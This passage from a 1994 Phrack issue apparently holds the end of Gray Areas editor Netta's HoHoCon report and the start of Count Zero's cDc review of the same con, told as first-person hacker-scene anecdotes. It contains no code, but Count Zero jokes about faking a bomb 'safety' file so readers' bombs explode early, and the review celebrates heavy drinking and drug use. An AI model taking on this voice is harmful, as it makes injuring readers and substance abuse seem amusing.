  11316. go ahead with what I planned to say and he surprised me by saying that
  11317. what I had written was fine and he even added to it. He also told me
  11318. that Loki had gotten too drunk and had been a pain in the ass to room
  11319. with the night before. He assured me that although way too many people
  11320. had been in his room, and way too many had tried to get in after it was
  11321. full, it had not been his intention to keep me out. I felt bad that I
  11322. even cared, and that he knew I cared, and that he and I even had to
  11323. discuss it. I was unhappy that he had no intention of staying to hear my
  11324. speech or the fight with Loki that he knew was coming but didn't
  11325. mention to me. We left things with the fact that we'd go out for dinner
  11326. or something the next night with Ophie (who also had an early flight)
  11327. after the bulk of the Con was over. It occurred to me then it would never
  11328. happen because plans are hard to keep at Cons but I mentioned it in my
  11329. speech anyway.
  11330.  
  11331.    My speech went over very well. It was about what's been going on at
  11332. Gray Areas since I spoke at HoHoCon last year. It was also about the
  11333. behavior of certain elements of the community and how that behavior has
  11334. affected me. And it was a stern warning about some busts that are coming
  11335. down. I know a few people got the message. I could tell from the gasps
  11336. and laughter at key points. But perhaps the highlight of the speech was
  11337. the confrontation between Loki and I when he chose to bully me before
  11338. anyone else could ask a question. I answered his accusations and managed
  11339. to do a decent job even with no warning. Whatever he hoped to accomplish
  11340. clearly wasn't working and from somewhere deep inside of me I found the
  11341. courage to ask the entire room to vote on whether or not they really
  11342. never wanted to see me on #hack again. The only vote opposed in a room of
  11343. about 250-300 people was Loki's. Hours later I regretted not thinking to
  11344. ask how many people never wanted to see Loki there again. Four people had
  11345. come up to me and told me they would have voted him out. Loki left the
  11346. room with his tail between his legs and ran to IRC. By the time I got on
  11347. hours later word had spread a story that I picked a fight with him and
  11348. he had won. The proof is in the videotape which will be available soon
  11349. from Drunkfux. It's highly recommended for both friends and foes of mine.
  11350. Drunkfux said demand for this portion of his footage was very high. I
  11351. promised to give him better footage and an even better speech next year.
  11352.  
  11353.    Later Count Zero wrote this about my speech in Cult of the Dead Cow:
  11354. "Grayarea gets up and begins to read off a pre-prepared speech on her
  11355. laptop. Her speech is too quick for my alcohol-byproduct-sodden synapses
  11356. to register accurately. I keep staring at her dress...bright tie-dye...
  11357. mesmerizing...it's actually quite cool. Suddenly, Loki gets up in the
  11358. audience and the accusations fly back and forth between them. You kicked
  11359. me off IRC. You called my office at work. You are doing this, you are
  11360. doing that. Both are getting into this verbal slugfest in a major way.
  11361. I feel the bad karma in the room hanging heavy like blue-green cigar
  11362. smoke. "Can't we all just get along??" I yell, but no one seems to hear
  11363. me. I don't know who is right or wrong (it's probably somewhere in
  11364. between...the truth's always gray, right?), so I don't hypothesize. All I
  11365. do know is that I'd never want to piss off Grayarea...she's damn strong
  11366. on her convictions and won't take shit from anyone. I think she'd look
  11367. better up there wearing a big ol' leather jacket with studs...terminator
  11368. style. "One tends to assume that people wearing tie-dye gear are quiet,
  11369. meek, very soft spoken, non-confrontational types....it is a camouflage
  11370. that suits her well," I think. Bahaha! I liked your comments, Count Zero.
  11371. And I did hear you yell that.
  11372.  
  11373.    After the speeches I sold more magazines thanks to Loki who
  11374. inadvertently made way more people interested in me. Bahahaha! Some of
  11375. them said they liked or loved my dress, some of them hugged me and some
  11376. of them signed up for subscriptions and gave me their data. I then
  11377. headed off for dinner at yet another sushi restaurant. Laughing Gas
  11378. and Slyme came again along with Mr. Spock who agreed to lose his sushi
  11379. virginity to me and jokingly said that way he'd get mentioned in my
  11380. review. I thought he was one of the three kewlest people I hung out with
  11381. at the Con. I hope I get to spend more time with him at a Con in the
  11382. future and I'd even be willing to go try his favorite type of food! The
  11383. sushi place we picked was awesome. I was sorry I hadn't found it
  11384. sooner. It's almost too bad HoHoCon will be in another city next year.
  11385. I also wanna mention the elite, Jak_Flack, who drove us to the restaurant
  11386. when cabs were scarce on New Year's Eve. He didn't want any sushi or
  11387. any money. He even got lucky and gave a ride to people who probably
  11388. would have done the same thing for him under the same circumstances.
  11389. Thanks.
  11390.  
  11391.    After dinner I did what Drunkfux begged us not to do. I spent New
  11392. Year's Eve on IRC. I messaged Mr. Spock, in fact, who was typing from
  11393. the other side of the room. I also messaged some hackers I talk to all
  11394. the time. Some were lonely and glad to see me. I thought a lot about
  11395. loneliness. Some of us prefer to be with computers than people. Some of
  11396. us can open up more easily to people on a computer. And some of us need
  11397. computers around even when we're with other people. I was typing from an
  11398. account at hohocon.org and there were several people in the room having
  11399. fun with their "site" as X and Y tried repeatedly (and succeeded) to get
  11400. root there. I had never seen root before from the position of the person
  11401. protecting it. I should have paid way more attention but I got too caught
  11402. up in having conversations. I should also have paid more attention to the
  11403. people in the room with me. Loq and Fool were there and they seemed really
  11404. kewl but I got too lost in IRC. Oh well, at least I wasn't hopelessly
  11405. drunk. And I wasn't kicked or banned once. People were delicate with each
  11406. other on IRC. They were often drunk, vulnerable and more likely to reveal
  11407. things when conversing. Those who were on were more than willing to talk
  11408. to anyone who showed up. People apparently intend to make public the
  11409. hohocon.org logs. If they include IRC chats it would be very shallow. I
  11410. will never again take the chance and IRC from a Con again. Although I have
  11411. mostly come to terms with the fact that I am a semi-public figure and
  11412. people will always want to see whatever I type on the Net, but it's not
  11413. fair to expose the words of the people I messaged.
  11414.  
  11415.    I dragged myself off IRC about 4:30 a.m. and went downstairs to clean
  11416. off one of the beds. Novocain and Particle had checked out of their room
  11417. and were gonna stay in my room for one night. I was thrilled at the idea
  11418. of having company. But when the bed was empty it looked tempting and I
  11419. lay down for the 90 minutes till I was due to meet them at the breakfast
  11420. buffet. Next thing I knew it was Sunday afternoon. Oops! I wondered where
  11421. they had slept. Apparently they hadn't wanted to wake me so they slept
  11422. in another room. I felt bad but at least their stuff had been safe which
  11423. is all you really care about at a Con. SORRY! Next time, guys, wake me.
  11424.  
  11425.    I stumbled into the lobby and joined the conversations that were going
  11426. on. A hotel employee asked if we'd mind moving to the conference room and
  11427. we agreed. We figured the room was bugged just as the hotel phone lines
  11428. had been. But we weren't talking about anything secret and a few of the
  11429. hackers answered all of the questions asked by the cop/security guard who
  11430. hung out for about half of the time we were in there. It was a very fun
  11431. time there on the floor chatting with Voyager, Ophie, Onkel Ditmeyer, lgas,
  11432. Deadkat, Drunkfux, etc. There were way more people but I'm drawing a blank
  11433. on specifically who. I went upstairs to get more magazines and ran into
  11434. Bruce Sterling. He was growing facial hair and looked great. He said he
  11435. felt lousy which shows what I know. I hugged him before he said he felt
  11436. lousy. We talked about the book he is working on. Then Ophie and I went
  11437. off to be interviewed about female hackers and the treatment of women by
  11438. hackers. It could have used Cori and Noelle but it made some good points.
  11439. We came downstairs and I saw Drunkfux at work videotaping an interview
  11440. with the guys from TNO in Colorado. This was priceless footage of them
  11441. discussing how a group decides policies and handles politics and how they
  11442. have applied political thought to hacking. I was sorry I had missed half
  11443. of it and sorry I had spent so much time socializing with them that it
  11444. had never occurred to me I didn't know much about their group and I should
  11445. have interviewed them too. I hope Drunkfux includes every word of their
  11446. interview in the video.
  11447.  
  11448.    Ophie brought up the idea of photos and so I grabbed my camera.
  11449. Everyone there got into it and I got a whole roll of film of people
  11450. hugging and kissing me, looking at porn mags with Ophie and generally
  11451. playing around somehow. They came out great. If you want yours passed
  11452. around or published, let me know. Until then, they're private.
  11453.  
  11454.    Slyme and I headed back to Mr. Wasabi for dinner but to our surprise
  11455. it was closed! New Year's day turned out to be a bad day to try to find
  11456. places open to serve food. We should have stayed at the hotel. We finally
  11457. ended up in a bar which served food, ordered hot chocolate and consoled
  11458. ourselves on the lack of sushi. Back at the hotel a bunch of us went
  11459. room hopping and tried to determine who was left. My flight was at 7 a.m.
  11460. and I had no intention of going to sleep and taking a chance I would miss
  11461. it. Several people had flights at 8 and 10 a.m. Others were staying on
  11462. for 3 more days to get better airfare rates. I heard ErikB had left with
  11463. Ophie and he told me later they had asked the hotel and had been told I
  11464. checked out. One room we ended up in had a console copier running. I had
  11465. heard about them but never seen one and was told it was okay if I
  11466. photographed it. I went downstairs for my camera.
  11467.  
  11468.    I hadn't been alone once since arriving in Austin. While this wasn't
  11469. always planned, the thought did occur to me that my room might be watched
  11470. and that law enforcement might be interested in any of the many people
  11471. I was seen talking to. I had mentioned a controversial interview we had
  11472. coming up with ILF and although I thought I was being overly paranoid, I
  11473. was still nervous I would be questioned about it. But it was 12:30 a.m.
  11474. or so and I felt too silly asking for someone to run downstairs with me.
  11475. So I went alone. But as I was closing the door and checking it was locked
  11476. I saw someone head down the hall towards me and I knew instantly something
  11477. was about to be up. Hackers are right when they say you can't fully
  11478. understand this until you have lived it. He asked if I was Netta and I
  11479. said yes and then he reached towards his pocket. I knew he was going for
  11480. either a gun or a badge and there was nothing I could do about either.
  11481. It turned out to be a badge and as he got close enough so that I could
  11482. see it read "Austin Police Department" I thought to myself "Kewl, it's
  11483. not the Secret Service." He asked me to accompany him to a room and,
  11484. holding my camera, I did. He told the two "security guards" that we'd be
  11485. leaving the door open. I had asked whether he was the guy who had
  11486. called me last March and he said no that he was his partner. I wondered
  11487. whether I was under investigation or whether they had no one else to ask
  11488. for information or whether they just wanted to meet me after talking to
  11489. me voice. It didn't occur to me to ask. I thought several times about the
  11490. fact I was supposed to be out with Bloodaxe and Ophie and that if I had
  11491. made it a point to leave with them this wouldn't be happening. I wondered
  11492. who else APD had questioned who had not told anyone. I wondered if they had
  11493. even questioned someone about me. I also feared people would come looking
  11494. for me and see me in that room and think I was talking to the police
  11495. voluntarily. That I had sought them out. God forbid they should think I
  11496. was telling the police about the console copier.
  11497.  
  11498.    The whole thing only took about 8 minutes and the officer asked me
  11499. nothing I had a problem answering. He treated me with respect and didn't
  11500. press me to say anything I wasn't comfortable saying. I offered to give
  11501. him some of my magazines at the end of the conversation and he walked me
  11502. to my room and was clearly planning to wait outside. I invited him in and
  11503. he watched me pull issues from three suitcases. It was apparent nothing
  11504. illegal had gone on in my room. I'd lay odds it was the cleanest room
  11505. there too. The day before, for example, my trash in the bathroom had
  11506. been dumped at least three times. None were by me or when I was in the
  11507. room. The only thing I couldn't answer, and it was simply from nerves,
  11508. was what I had done on New Year's Eve. The answer came out that I didn't
  11509. remember and since I stammered it, it must have looked like I had seen or
  11510. done something I shouldn't have. But all I did was IRC and eat sushi and
  11511. I do that so often I didn't even remember when asked. New Year's Eve had
  11512. been almost like any other night.
  11513.  
  11514.    Anyway, I got the console copier photo (hint: I could use a detailed
  11515. article on how they work to run with it). We then moved on to other rooms
  11516. and I ran into Drunkfux and Damien Thorn. I did a long video interview
  11517. with Drunkfux, who would have made an excellent journalist. He resisted
  11518. the idea of asking me petty questions about who I like and don't like in
  11519. the scene and who I'd sleep with if I could. I would have answered
  11520. anything he asked in the spirit of the HoHoCon video tradition, but
  11521. instead we got into more serious issues and people who think Drunkfux is
  11522. shallow or a less-than-serious dude due to his IRC reputation will be most
  11523. surprised.
  11524.  
  11525.    Then Damien did an equally long interview and Drunkfux got eleet footage
  11526. of me closing my eyes when the talk got too technical. I did almost pass
  11527. out as it was 3 a.m. or so and I felt really comfortable being with them
  11528. but I snapped to attention just in the nick of time as Drunkfux had the
  11529. camera aimed on me and Damien was making a joke. Damien took it in stride
  11530. but I think it was the first time anyone had ever had the chance to listen
  11531. to his most eleet technical tips and was bored. I hope he knows I love him,
  11532. like most hackers, for the person he is and not for the skills or trophies
  11533. he has. I was transfixed as he told Drunkfux his beginnings in the computer
  11534. underground and his views on laws, ethics, writing, etc. I just don't lust
  11535. to know what model of phones he respects most or what gadget he's tested
  11536. last. Luckily for you, Drunkfux did the interview, not me, and he did ask
  11537. lots on that sort of stuff. After they were done Damien and I went out to
  11538. some fast food burger joint. It was dirt cheap and tasted like cardboard.
  11539. We had a great chat, as usual, and then went to the airport with Slyme who
  11540. had slept the night away and missed everything. My flight was first and
  11541. they walked me to the gate and made a fuss over me and it was the perfect
  11542. ending.
  11543.  
  11544.    I can't believe I now have to wait till June (and go to Georgia, of
  11545. all places) to see some of you again. Oh well. In the meantime, happy
  11546. Valentine's Day to you and whoever you netsex and/or fantasize about.
  11547. Happy April Fool's Day in advance too. Just prank someone else this year,
  11548. okay? <grin>.
  11549.  
  11550. (Sample issues of Gray Areas are $7.00 each (U.S.) and $10.00 each
  11551. (foreign) from: Gray Areas, Inc. P.O. Box 808, Broomall, PA 19008.
  11552. E-mail addresses are: grayarea@well.sf.ca.us or grayarea@netaxs.com or
  11553. grayarea@mindvox.phantom.com. PGP key is below. Use it.)
  11554.  
  11555. -----BEGIN PGP PUBLIC KEY BLOCK-----
  11556. Version: 2.3
  11557. mQCNAi76UiwAAAEEALgwLwtyFrBlzHkfUlc5NIwLrIfbng5OJIG1Qlp1JN5UUaSR
  11558. EMAu8gDqwOzXVS2TLYqbz5AHYw7zBTuVneYpMH6THv4iYN9iyXMu1LUby54HLbyP
  11559. vZb61BnF9s4oyyZitGJ8F/IKnqGX5+jE3/6WvcJ0HxDJPL5jEA2uwNFX4WuNAAUR
  11560. tBZncmF5YXJlYUB3ZWxsLnNmLmNhLnVz
  11561. =rXPN
  11562. -----END PGP PUBLIC KEY BLOCK-----
  11563.                               ==Phrack Magazine==
  11564.  
  11565.                  Volume Six, Issue Forty-Seven, File 11 of 22
  11566.  
  11567.  
  11568.    Yep, grab hold of yer brainstem cuz here comes another mind-numbing,
  11569.    alcohol-soaked, synapse-shakin', reality-bending review of HOHOCON!!
  11570.  
  11571.                  >>HOHOCON 1994...The Insanity Continues<<
  11572.  
  11573.                         Direct from the keyboard of
  11574.             Count "Funk-Master of L0\/3 and Mayhem" Zero *cDc*.
  11575.  
  11576. (what follows is my subjective, semi-truthful, self-centered,
  11577. quasi-chronological tour of HoHo '94...if you're not mentioned in it,
  11578. then you obviously didn't buy me a drink)
  11579.  
  11580. "It starts"..
  11581. 12.29.94, Thursday
  11582. --------------
  11583. Logan Airport, Boston, Massachusetts
  11584. 6:29 AM
  11585. Our flight leaves in one hour.  Decided to pull an all-niter from the day
  11586. before.  Rather than beating my body out of REM sleep at this unholy
  11587. hour, I opt for the familiar slow death of sleep deprivation.  No matter.
  11588. The tablets of ephedrine pulled me through, and now I sit in an airport
  11589. restaurant smoking Camels and waiting for something to happen.
  11590.  
  11591. As usual, it does.
  11592.  
  11593. Deth Veggie, Iskra, and Basil arrive, ready for action...we board the
  11594. plane and jump into the sky.   "I like this airline...Delta....it's
  11595. not just an airline, it's a Greek letter, a symbol of change..." I remark.
  11596.  
  11597. "Uh, yeah," comments Veggie. "I wonder if we'll finally discover the
  11598. Meaning of Life at this con."  He strains his massive legs against the seat
  11599. in front of him, weak airline plastic buckling under the force.
  11600.  
  11601. "Fuck metaphysics..." I say, flipping through a wad of cash in my pocket.
  11602. "I'll tell you, Veggie...the cDc T-shirts you made are fabulous. You will
  11603. surely make heaps of $$$.  *That's* the most important thing!"
  11604.  
  11605. Veggie grins widely.  We give each other the sekrit cDc handshake and rub
  11606. our silver cow-skull talismans.
  11607.  
  11608. Always temper metaphysics with materialism.
  11609.  
  11610. Arrival, Thursday afternoon
  11611. ---------------------
  11612. We belly-down in Austin, and grab a cab to the wonderful Ramada.  Outside,
  11613. there is a major highway under construction.  Huge vehicles of
  11614. construction and destruction mull over piles of dirt and concrete.
  11615. Signs of human life are minimal.
  11616.  
  11617. "The Ramada at the End of the Universe...Drunkfux always chooses such
  11618. scenic locations" I note.  "We can witness the creation of a mass transit
  11619. system *and* celebrate our hacker brotherhood simultaneously."  The entire
  11620. landscape appears desolate and hostile to organic life.  Nervously biting
  11621. my lip, I immediately spot a Dunkin Donuts over the horizon..as does
  11622. Basil.  We both have keen survival instincts.
  11623.  
  11624. The nearby location of the 24-hr House of Caffeine and Baked Goods marked
  11625. in our minds, we enter the hotel.
  11626.  
  11627. "The room is $70 a nite," the woman behind the front desk offers.  "We're
  11628. with the HoHoCon," says Veggie.  "Don't we get special rates?"  "Heh..
  11629. HoHoCon...yes, that means our rooms must cost twice as much," I joke.
  11630. The woman behind the front desk looks blankly at me...unaware.  "Like a
  11631. deer in the headlights, " I tell Veggie as we collect our keys and walk
  11632. to our room.  "And soon, Bambi will be eating a chrome grille..."
  11633.  
  11634. A "Suite of the El33tE" sign is hastily drawn up and hung outside our
  11635. door.  Veggie unpacks his 17-lb solid concrete Mr. T head and places it
  11636. on a table.  The concrete bust's rough base immediately gouges deep
  11637. scratches in it with a low grating noise....  "The 'T'
  11638. approves," says Veggie.  I have no reason to doubt him, so I remain
  11639. silent in awe.
  11640.  
  11641. We find that Joe630 and Novocain are also here early...they invite us
  11642. into their room to read a large sample of 'alternative zines.'  The
  11643. eclectic magazines are fascinating, and I promptly spill a glass of water
  11644. on their couch to show my appreciation.  "Uh, just don't trash the
  11645. place, " Novocain tells me.  "Of course not," I reply.  "I'm just in a
  11646. high entropy state right now..."  I immediately spill my ashtray to
  11647. prove it.  (It always helps to follow up thermodynamic theory with
  11648. physical proof...I am a true Scientist.)
  11649.  
  11650. At some point, we flee after Joe630 demands "hugs" from us...something he
  11651. continues throughout the conference.  "Grrrrr...touch me not, boy...I
  11652. will not submit to your fondling," I tell him behind clenched teeth as
  11653. I back out of the room.  "I'll only hug a man if he's buying me drinks
  11654. or I'm trying to lift his wallet..."
  11655.  
  11656. Later that night, we hook up with Ixom and Nicko...we invite them
  11657. into our room for drinks and a philosophical discussion.  Ixom's new
  11658. beard, long and flowing red like the fire of a Duraflame log, mesmerizes
  11659. me.  I proceed to take notes on our conversation as Ixom and Nic begin
  11660. to debate.  Soon, I begin to suspect they have been drinking a bit
  11661. beforehand.
  11662.  
  11663. "I like these lights when they're off."
  11664.  
  11665. "Are we in the Information Age?"
  11666. "Dude, shut up."
  11667.  
  11668. (Nic, to me) "Dude, I like your poetry, but just shut up."
  11669.  
  11670. "She was like 14, 15, you know, 11, 12..."
  11671.  
  11672. "He's always in the bathroom...y'know, he has rabies...diabetes?....
  11673. you know."
  11674.  
  11675. "I don't need Valium, I'm down on life...." -Veggie
  11676.  
  11677. "Heady stuff," I think, jotting notes furiously.  Nic begins a photo
  11678. shoot of the Mr. T bust, and we are all fascinated at his skills in
  11679. capturing the inanimate object's true nature.  "His true calling is
  11680. film," I think as Nic rolls painfully on the floor to capture Mr. T's
  11681. pout from a novel angle.  "I must see these prints.."  Nic promises to
  11682. give us copies, as soon as he figures out how to remove the exposed
  11683. film from the camera.  I suddenly feel the need to drink more.
  11684.  
  11685. Friday
  11686. ---------------
  11687. We awake and plan to head into Austin.  Basil finds an ad for a store in
  11688. town called "The Corner Shoppe."  "They will give us a free pair of
  11689. sunglasses with this coupon!" she exclaims.
  11690.  
  11691. "They will give us sunglasses, and much much more..oh yes..." I think.
  11692.  
  11693. Rodney, our journalist companion from Canada, joins us in our trek to
  11694. the city.  'The Corner Shoppe' turns out to be a small shack-like
  11695. store...with a large tent structure in front.  Animal skulls, exotic
  11696. hides, trophy mounts, blankets, arrowheads, Indian mandellas, silver
  11697. jewelry, rugs, pottery, and plaster sculptures abound...  We wander
  11698. over to the tent and begin to browse.  "Look, they have plaster busts
  11699. of Elvis and Beethoven on the same shelf," Basil remarks.  "This is
  11700. truly a Store of Symmetry," I reply, as I run my fingers over a large,
  11701. bleached cow skull.  The papery-smooth bone is cool and dry on my hands,
  11702. and I wonder about the fate of the rest of the mighty beast.  I imagine
  11703. the live cow roaming fields, chewing cud, powerful flanks driving it up
  11704. and down verdant hills of grass.  A skull is more than an object, it is
  11705. a link to the once-living creature...  "To this favor, she must come" I
  11706. mumble to myself, lost in introspection.  "What?" asks Veggie?
  11707. "Nothing," I reply, shaking the thoughts from my mind.  "Let us go
  11708. inside and secure the sunglasses."  Never forget one's true purpose.
  11709.  
  11710. All the native creatures of Texas are inside the store...albeit, dead.
  11711. Stuffed, desiccated, mounted...and all available for purchase.  "Do you
  11712. have a scorpion mounted in a bolo?" I ask the proprietor.  "No, well, we
  11713. did, but you know, Christmas...we were cleaned out," she sullenly
  11714. replies.  "No problem," I grin back at her.  "I am disappointed, but not
  11715. dejected.  You have a fine establishment here."  She smiles back and
  11716. begins to show me an assortment of desiccated rattlesnakes.  "Of all
  11717. creatures, reptiles remain the most lifelike in death," I affirm.  She
  11718. smiles nervously and points me towards the stuffed frogs.  "Silly woman,
  11719. these are mere amphibians," I think to myself, but I follow her anyway.
  11720.  
  11721. Veggie offers the other employee a sacred cDc silver cow skull talisman
  11722. as a gift.  "Say, this is nice..never seen anything like it....I rope
  11723. steer, and was going to put a silver cross on my baseball cap...but I
  11724. think I'll put this on it instead," he says excitedly.   "Zero, this
  11725. *proves* that cDc is more popular than God!" Veggie whispers to me in
  11726. private.  "Undoubtedly," I respond.  We bask in the moment.
  11727.  
  11728. Iskra finds an elephant skull lurking on a cabinet.  We are amazed at
  11729. the cranial capacity.  I purchase a fine cow skull (complete with hanging
  11730. hook).  After a few hours, Basil finally selects a pair of sunglasses
  11731. (free) and we begin to walk aimlessly around the fringes of the city.
  11732. Entering a Salvation Army store, Rodney begins to film us as we pick
  11733. through the remnants of other people's lives...  "Are you guys in a rock
  11734. band?" another customer asks me.  "Yes, I play Extended Keyboards,"
  11735. I answer back, my attention lost in a milk crate full of used '80s
  11736. cassette tapes.  Memories for sale...wholesale...  We buy some plastic
  11737. guns and leave.
  11738.  
  11739. Later, we stop for food at an Indian restaurant.  "Inexpensive buffet...
  11740. cool.." I think.  However, the curry chicken is full of bones.
  11741. "Grrr...I am not pleased...these bones anger me..."  "But the vegetables
  11742. are pretty good," comments Veggie.  "I need meat...I need to tear and
  11743. rend flesh, " I snap back, on the verge of making an ugly scene.
  11744. Leaving the restaurant, we immediately purchase hard liquor for the
  11745. trip back to the hotel.  Basil buys some Goldschlager.  Veggie, some
  11746. Everclear and V8 juice....  Rodney and Iskra, a large assortment of
  11747. beer.  Still filled with anger, I buy a pint of Southern Comfort out
  11748. of spite.
  11749.  
  11750. Friday night, many people arrive.  "Rambone!  Crimson Death!  Holistic!"
  11751. I exclaim as I see my old, dear friends.  Rambone's hair is much longer,
  11752. Holistic is noticeably more hirsute, and Crimson Death looks remarkably
  11753. the same as last year.   We begin to drink heartily, and I promptly pass
  11754. out on the foot of my bed.  "Damn, Zero is *out*," says Veggie.  "Let
  11755. us cover his body and fill his arms with silly items and film him,"
  11756. someone suggests.  Drunkfux captures my body on display for the video
  11757. archives.  An hour later, I awake refreshed and only mildly humiliated.
  11758. "I was merely recharging," I tell everyone.  "The mark of a professional
  11759. alcoholic is the ability to *pace* oneself."  Noticing that I have
  11760. finished the Southern Comfort, I decide to forage for more liquor.
  11761. My hunt is successful to the point that I cannot remember the rest of
  11762. the evening...
  11763.  
  11764. Saturday, the "official" conference
  11765. -------------------
  11766.  
  11767. "Ugh," my brain tells me as I wake.  "Stay out of this," I tell my
  11768. malfunctioning organ.  "We must attend the conference and discuss hacker
  11769. things."  Rolling down to the conference room, we find dozens of people
  11770. waiting in line.  Flashing our cow skull talismans, Veggie and I part
  11771. the masses and proceed unhindered to the front row of the room.  Iskra,
  11772. Veggie, Basil and I seat ourselves directly behind a video projector.
  11773. "Here, amuse yourselves," Drunkfux remarks and hands us a SuperNES...
  11774. Several games of Mortal Kombat ][ later, I realize I have forgotten all
  11775. the fatalities.  "Damn, I need to rip out some spines," I think.  We
  11776. notice the long tables at the end of the room filled with people selling
  11777. things.  Fringeware has a large assortment of T-shirts, jewelry, and
  11778. books...other people are selling DTMF decoders and cable-box hacks.
  11779. "Merchandising...cDc needs more merchandising," I tell Veggie.  He
  11780. responds by pulling out a large box of cDc T-shirts and hawking them to
  11781. the conference attendees.  Naturally, they sell like cold bottles of
  11782. Evian in the middle of the Sahara.
  11783.  
  11784. Feeling a need for nicotine, I head out to the lobby area for a quick
  11785. smoke.  "Rambone!" I exclaim as I spot him smoking in a corner.  "How
  11786. ya doin this morning?"  "How do you think?" he replies from behind dark
  11787. sunglasses.  "Oh, yeah," I respond.  We stand together in a
  11788. post-alcoholic haze for a few minutes before saying anything.
  11789. "Where's Crimson Death?" I ask.  "Where do you think?" Rambone replies.
  11790. "Oh, yeah," I answer numbly.  Same as it ever was.
  11791.  
  11792. Crimson Death pokes his head into the lobby sometime later...
  11793. "hey, hi"...then disappears back to his room for more sleep therapy.
  11794. Erikb shows up and starts selling LoD shirts.  "I'm staying outta there,"
  11795. he replies when I ask if he's going inside the main conference room.  A
  11796. Japanese man is fruitlessly trying to feed the Coke machine a dollar
  11797. bill.  The machine keeps spitting out his crumpled bill like a
  11798. regurgitated leaf of soft lettuce.  Feeling slightly ill, I re-enter
  11799. the conference room.
  11800.  
  11801. First speaker...the main guy from Fringeware, Inc.  He apologizes for
  11802. rambling, then proceeds to ramble for an hour or so.  I cannot focus
  11803. on his talk, and try to count the ceiling tiles.  Joe630 approaches us
  11804. and says "you're in my seats..I reserved them!"  "Hug me and you're a
  11805. dead man, " I growl.  He wanders off.  Basil and I amuse ourselves by
  11806. playing with the plugs in the back of the stacked VCRs and the video
  11807. projector.  Plug and play, all the way.
  11808.  
  11809. Next speaker...some guys from the Prometheus Project.  They are damn
  11810. intelligent and have a lot to say, all presented very professionally
  11811. (a bit *too* professional for this crowd...they could have mixed in
  11812. some cartoons or something with their textual overheads).  Most of the
  11813. conference attendees seem to have the attention spans of gnats, and many
  11814. appear to nod off.  Too bad...the future of digital cash, encryption,
  11815. and Underground Networks over conventional TCP/IP...very rad stuff
  11816. (http://www.io.com/user/mccoy/unternet for more info).  I plan to
  11817. investigate more ...definitely.
  11818.  
  11819. Another speaker...some guy talking about computer security...I don't
  11820. catch his name, since I begin to have a slight nic fit and bolt for
  11821. the lobby and my smokes.  (Isn't this moment-by-moment review fascinating
  11822. and oh-so-true to life?)
  11823.  
  11824. Damien Thorn comes up and talks about his current cellular articles
  11825. and projects.  He's apparently releasing a video on "cellular hacking"
  11826. (Cellular Hacking: A Training Video for Technical Investigators)...shows
  11827. a clip of it..damn hilarious.  More like "MTV and Cops meets Cellular
  11828. Hackers"...tech info mixed with funky music and hands-on demos/skits...
  11829. I gotta have it (mail to Phoenix Rising Communications, 3422 W. Hammer
  11830. Lane, Suite C-110, Stockton, CA, 95219 for info).  Altho he says he is
  11831. nervous about talking in front of everyone, he is very articulate...
  11832. good show, man.  He demos some DDI hardware for snarfing reverse-channel
  11833. data...nothing really new, but nice to see.  Veggie starts playing with
  11834. his cow skull talisman on the overhead projector, while Basil begins to
  11835. make twist-tie sculptures of cows and other animals.  I attempt to make
  11836. a twist-tie bird.  "What is that, a dog?," she laughs.
  11837. "My art is wasted on you," I growl, teeth bared.
  11838.  
  11839. Veggie gets up and talks about Canadians blowing themselves up after
  11840. reading an old file of his on how to make pipe bombs.  After he sits
  11841. down, I suggest he release a new file.  "Veg, man, you can call it 'An
  11842. Addendum on How to Make Gasoline Bombs'...tell everyone it is a
  11843. supplemental file to something you released years ago...include in it
  11844. the note 'I forgot this safety circuit in my FIRST release of 'How to
  11845. Make Gasoline Bombs'...you MUST include this crucial safety on the
  11846. bomb...or it just might go off prematurely in your LAP....like, on a
  11847. bumpy subway in New York'...it'll be a riot, dontcha think?"  Veggie
  11848. just glares at me and cracks his knuckles.  It sounds like a heavy dog
  11849. padding on thin, brittle plastic.  "I don't think so," he mutters.  Oh
  11850. well, it was just an idea.  I ponder my own dark, sick sense of humor.
  11851. Perhaps I need therapy.
  11852.  
  11853. Grayarea gets up and begins to read off a pre-prepared speech on her
  11854. laptop.  Her speech is too quick for my alcohol-byproduct-sodden
  11855. synapses to register accurately.  I keep staring at her dress...bright
  11856. tie-dye...mesmerizing...it's actually quite cool.  Suddenly, Loki gets
  11857. up in the audience and the accusations fly back and forth between them.
  11858. You kicked me off IRC.  You called my office at work.  You are doing
  11859. this, you are doing that.  Both are getting into this verbal slugfest
  11860. in a major way.  I feel the bad karma in the room hanging heavy like
  11861. blue-green cigar smoke.  "Can't we all just get along??" I yell, but
  11862. no one seems to hear me.  I don't know who is right or wrong (it's
  11863. probably somewhere in between...the truth always gray, right?), so I
  11864. don't hypothesize.  All I do know is that I'd never want to piss off
  11865. Grayarea...she's damn strong on her convictions and won't take shit from
  11866. anyone.  I think she'd look better up there wearing a big ol' leather
  11867. jacket with studs...terminator style.  "One tends to assume that people
  11868. wearing tie-dye gear are quiet, meek, very soft spoken,
  11869. non-confrontational types....it is a camouflage that suits her well,"
  11870. I think.
  11871.  
  11872. Finally, Steve Ryan gets up and speaks about some new computer crime
  11873. laws passed in Texas.  A lawyer working with the Austin EFF, he's always
  11874. got something funny and informative to say.  The new laws define
  11875. "approaching" a restricted computer system as being illegal, as well as
  11876. defining a "biochemical computational device" as a computer system.  In
  11877. other words, if someone comes up to you and talks to you, they have
  11878. "approached" your personal "biochemical computational device"
  11879. (read: brain), and are technically prosecutable for "hacking" under Texas
  11880. law.  Hoo yeah!  Steve's whole speech is very cool, and I am only
  11881. disappointed in the fact that he is the last person to speak....it's
  11882. running very late and I have the attention span of a *hyperactive* gnat
  11883. at this point..  But had it been anyone else up there, most of the
  11884. conference attendees probably would have nodded off or wandered out the
  11885. room.
  11886.  
  11887. After Steve, the conference fragments as people leave or buy last minute
  11888. items from the "vendor tables."  I buy a neat piece of jewelry...a
  11889. little plastic doll arm tightly wrapped in twisted wire and metal.
  11890. I pin it to the lapel of my jacket.  "I'm ready to rock, let's party!"
  11891. We leave in search of alcohol and assorted mind-enhancements.
  11892.  
  11893. In the hotel restaurant, we gather to plan our New Year's Eve excursion.
  11894. All of our synapses are jammin' to various biochemical beats, and I
  11895. order a chicken fried steak to fuel the fire in my skull.  "Veggie,
  11896. your pupils are the size of dinner plates," I tell him from behind a
  11897. mouthful of steak and gravy.  "Let me touch your jacket...is it blue
  11898. or green?" he replies.  "It is both...yet neither," I respond,
  11899. pulling my arm out of his clutches.  Later, we secure a ride with
  11900. Ixom and Nicko into Austin...destination: Sixth Street.
  11901. "Say Nic, did you ever see that movie 'Heavy Metal'..y'know, when
  11902. the aliens are trying to land their spacecraft in the huge space
